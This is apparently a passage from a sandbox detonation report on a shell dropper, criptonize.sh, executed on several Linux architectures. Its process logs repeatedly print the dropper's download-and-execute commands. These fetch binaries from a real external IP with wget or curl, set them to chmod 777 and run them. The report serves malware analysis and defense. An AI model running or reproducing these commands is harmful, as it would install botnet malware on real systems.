| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/bin/rm
[rm -f criptonize.armv6l]
/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/bin/rm
[rm -f criptonize.armv5l]
/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/bin/rm
[rm -f criptonize.armv4eb]
/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/bin/rm
[rm -f criptonize.armv4tl]
/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/bin/rm
[rm -f criptonize.armv4l]
/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/bin/rm
[rm -f criptonize.mips64]
/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/bin/rm
[rm -f criptonize.mips]
/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | | tcp |
Files
memory/712-1-0xb672a000-0xb673b044-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
debian9-mipsbe-20240611-en
Max time kernel
30s
Max time network
33s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
28s
Max time network
33s
Command Line
Signatures
Writes memory of remote process
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/criptonize.i686 | N/A |
| N/A | N/A | /tmp/criptonize.i586 | N/A |
Loads a kernel module
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/criptonize.i686 | N/A |
| N/A | N/A | /tmp/criptonize.i586 | N/A |
| N/A | N/A | /tmp/criptonize.i486 | N/A |
| N/A | N/A | /tmp/criptonize.i486 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.arc700 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.bsdamd64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/usr/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/wget
[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
/usr/bin/chmod
[chmod 777 criptonize.powerpc]
/tmp/criptonize.powerpc
[./criptonize.powerpc powerpc]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/wget
[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]
/usr/bin/chmod
[chmod 777 criptonize.m68k]
/tmp/criptonize.m68k
[./criptonize.m68k m68k]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/wget
[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]
/usr/bin/chmod
[chmod 777 criptonize.sh4]
/tmp/criptonize.sh4
[./criptonize.sh4 sh4]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/wget
[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]
/usr/bin/chmod
[chmod 777 criptonize.sparc]
/tmp/criptonize.sparc
[./criptonize.sparc sparc]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/wget
[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]
/usr/bin/chmod
[chmod 777 criptonize.arc700]
/tmp/criptonize.arc700
[./criptonize.arc700 arc700]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/rm
[rm -f criptonize.bsdamd64]
/usr/bin/wget
[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
debian12-armhf-20240729-en
Max time kernel
29s
Max time network
31s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.m68k | /usr/bin/curl | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/curl
[curl -o criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/curl
[curl -o criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/curl
[curl -o criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/curl
[curl -o criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/curl
[curl -o criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/curl
[curl -o criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/curl
[curl -o criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/curl
[curl -o criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/curl
[curl -o criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/curl
[curl -o criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/curl
[curl -o criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/curl
[curl -o criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/curl
[curl -o criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/curl
[curl -o criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/usr/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/curl
[curl -o criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
/usr/bin/chmod
[chmod 777 criptonize.powerpc]
/tmp/criptonize.powerpc
[./criptonize.powerpc powerpc]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/curl
[curl -o criptonize.m68k http://212.60.5.174/criptonize.m68k]
/usr/bin/chmod
[chmod 777 criptonize.m68k]
/tmp/criptonize.m68k
[./criptonize.m68k m68k]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/curl
[curl -o criptonize.sh4 http://212.60.5.174/criptonize.sh4]
/usr/bin/chmod
[chmod 777 criptonize.sh4]
/tmp/criptonize.sh4
[./criptonize.sh4 sh4]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/curl
[curl -o criptonize.sparc http://212.60.5.174/criptonize.sparc]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:57
Platform
debian12-mipsel-20240418-en
Max time kernel
0s
Max time network
13s
Command Line
Signatures
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |